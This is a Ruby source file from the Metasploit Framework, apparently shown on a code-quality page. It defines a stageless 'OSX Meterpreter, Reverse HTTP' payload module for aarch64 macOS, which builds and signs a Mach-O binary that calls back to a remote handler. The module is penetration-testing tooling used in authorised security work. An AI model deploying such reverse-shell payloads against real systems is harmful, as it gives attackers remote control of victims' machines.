rapid7/metasploit-framework

View on GitHub
modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb

Summary

Maintainability
A
30 mins
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Module generated by tools/modules/generate_mettle_payloads.rb
module MetasploitModule
  CachedSize = 813139

  include Msf::Payload::Single
  include Msf::Sessions::MeterpreterOptions
  include Msf::Sessions::MettleConfig

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OSX Meterpreter, Reverse HTTP Inline',
        'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
        'Author' => [
          'Adam Cammack <adam_cammack[at]rapid7.com>',
          'Brent Cook <brent_cook[at]rapid7.com>',
          'timwr',
          'usiegl00'
        ],
        'Platform' => 'osx',
        'Arch' => ARCH_AARCH64,
        'License' => MSF_LICENSE,
        'Handler' => Msf::Handler::ReverseHttp,
        'Session' => Msf::Sessions::Meterpreter_aarch64_OSX
      )
    )
  end

  def generate
    opts = {
      scheme: 'http',
      stageless: true
    }.merge(mettle_logging_config)
    mo = MetasploitPayloads::Mettle.new('aarch64-apple-darwin', generate_config(opts)).to_binary :exec
    Payload::MachO.new(mo).sign
  end
end